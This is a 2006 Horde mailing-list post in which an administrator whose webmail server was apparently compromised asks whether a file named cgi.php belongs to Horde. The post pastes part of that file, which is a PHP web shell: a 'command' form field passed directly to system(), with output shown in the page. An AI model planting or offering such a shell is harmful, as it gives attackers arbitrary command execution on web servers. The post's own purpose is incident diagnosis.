[horde] Phising despite latest CVS?
Jan Johansson
j2 at mupp.net
Wed May 3 14:04:24 PDT 2006
>The attacker has probably already installed a backdoor before you
>upgraded and is installing the file through that.
Ok, this is probably not correct? Is cgi.php even a Horde-file in its
_original_ form?
scooter:~# less
/var/www/webmail.skyddsrummet.net/horde/services/help/cgi.php
closedir($dir_handle);
?>
</select></p>
<p>Command: <input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Execute Command"></p>
<p>Enable <code>stderr</code>-trapping? <input type="checkbox"
name="stderr"></p>
<textarea cols="80" rows="20" readonly>
<?php
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam('/tmp', 'phpshell');
$command .= " 1> $tmpfile 2>&1; " .
"cat $tmpfile; rm $tmpfile";
} else if ($command == 'ls') {
/* ls looks much better with ' -F', IMHO. */
$command .= ' -F';
}
system($command);
}
?>
</textarea>
</form>
<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>
<hr>
<i>Copyright © 2000–2002, <a
href="mailto:gimpster at gimpster.com">Martin Geisler</a>. Get the latest
version at <a href="http://www.gimpster.com">www.gimpster.com</a>.</i>
</body>
</html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 3030 bytes
Desc: not available
Url : http://lists.horde.org/archives/horde/attachments/20060503/926711bb/smime-0001.bin
More information about the horde
mailing list